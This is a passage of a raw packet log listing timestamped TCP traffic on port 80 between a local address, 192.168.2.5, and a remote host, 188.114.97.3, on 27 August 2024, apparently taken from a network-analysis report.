                              Aug 27, 2024 09:48:56.991682053 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.991695881 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.991705894 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.991718054 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.991719961 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.991728067 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.991743088 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.991781950 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.991858959 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.991868973 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.991880894 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.991892099 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.991904020 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.991905928 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.991918087 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.991929054 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.991941929 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.991965055 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.992098093 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992108107 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992117882 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992130041 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992141008 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992152929 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992153883 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.992162943 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992170095 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.992177010 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992188931 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.992196083 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.992300987 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992310047 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992321968 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992333889 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992346048 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.992347002 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992358923 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992369890 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992372990 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.992391109 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.992413044 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.992521048 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992552042 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992562056 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992594004 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.992687941 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992698908 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992707968 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992743015 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.992755890 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992767096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992780924 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992789984 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.992790937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992801905 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992824078 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.992873907 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992885113 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992898941 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992922068 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.992942095 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992953062 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.992954016 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.992983103 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.995122910 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.995136023 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.995147943 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.995178938 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.995187044 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.995197058 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.995208025 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.995230913 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.995256901 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:56.995665073 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.995675087 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:56.995714903 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.170043945 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.177706003 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.275208950 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.275882959 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.280631065 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.380928993 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.380942106 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.380953074 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.380963087 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.380975962 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.380986929 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.380997896 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381010056 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381048918 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.381068945 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381109953 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.381187916 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381200075 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381210089 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381220102 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381231070 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381234884 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.381246090 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381258965 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381272078 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.381310940 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.381344080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381360054 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381369114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381378889 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381395102 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.381417036 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.381510973 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381526947 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381536961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381546021 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381557941 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381571054 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.381599903 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.381670952 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381680965 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381700039 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381706953 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.381710052 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381720066 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381731033 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381732941 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.381742001 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381752014 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381762028 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.381763935 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381774902 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381782055 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.381809950 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.381930113 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381939888 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381947994 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.381969929 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.381987095 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.382035971 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382045984 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382056952 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382067919 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382087946 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.382112026 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.382178068 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382189035 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382199049 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382209063 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382220984 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382234097 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.382249117 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.382328987 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382344007 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382354975 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382364035 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382365942 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.382376909 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382381916 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.382385969 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382396936 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382414103 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382427931 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382428885 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.382437944 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382451057 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.382453918 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382467031 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382472992 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.382477999 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382488966 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382493973 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.382519007 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.382770061 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382781029 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382812023 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.382880926 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382889986 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382901907 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382911921 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382920980 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.382924080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382935047 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382946968 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.382947922 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.382972002 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.382983923 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.383018017 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383029938 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383064985 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.383091927 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383102894 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383111954 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383125067 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383135080 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383138895 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.383162022 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.383230925 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383269072 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.383351088 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383361101 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383373022 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383383989 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383394003 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383398056 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.383404970 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383414030 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383421898 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.383435011 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.383490086 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383527040 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.383708954 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383719921 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383728981 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383739948 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383749962 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383754969 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.383760929 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383770943 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383780003 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.383781910 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383794069 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383802891 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.383805037 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383814096 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383822918 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383831024 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.383833885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383843899 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383853912 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383855104 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.383865118 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383876085 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383882999 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.383888960 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.383908033 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.383929014 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.384270906 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.384282112 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.384290934 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.384300947 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.384310961 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.384321928 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.384332895 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.384332895 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.384342909 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.384352922 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.384358883 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.384362936 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.384373903 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.384382010 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.384385109 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.384394884 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.384411097 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.384443045 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.386049986 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.469363928 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.469398022 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.469412088 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.469430923 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.469444036 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.469455004 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.469464064 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.469486952 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.469521046 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.469571114 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.469582081 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.469592094 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.469604015 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.469614983 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.469626904 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.469650030 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.469652891 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.469681978 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.469728947 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.469738960 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.469749928 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.469759941 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.469769955 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.469798088 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.469815969 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.469818115 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.469830990 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.469876051 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.469923019 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.469934940 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.469944954 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.469955921 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.469969034 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.469979048 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470000982 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.470031977 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.470060110 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470069885 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470081091 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470091105 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470103025 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470130920 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.470201015 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470247030 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470263004 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.470283985 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470294952 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470321894 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.470382929 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470392942 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470405102 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470439911 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.470470905 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.470504045 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470520020 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470531940 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470542908 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470591068 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.470603943 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470613003 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.470614910 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470626116 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470638037 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470654011 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.470680952 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.470707893 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470719099 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470772982 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.470874071 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470882893 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470892906 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470904112 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470916033 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470927000 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470932961 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.470937967 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470949888 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.470952034 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.470976114 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.470988989 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.471009970 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471020937 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471031904 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471040964 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471056938 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471081018 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.471100092 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471113920 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471123934 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471134901 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471139908 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.471148968 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471159935 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.471194029 CEST6138380192.168.2.5188.114.97.3
                              Aug 27, 2024 09:48:58.471278906 CEST8061383188.114.97.3192.168.2.5
                              Aug 27, 2024 09:48:58.471461058 CEST8061383188.114.97.3192.168.2.5
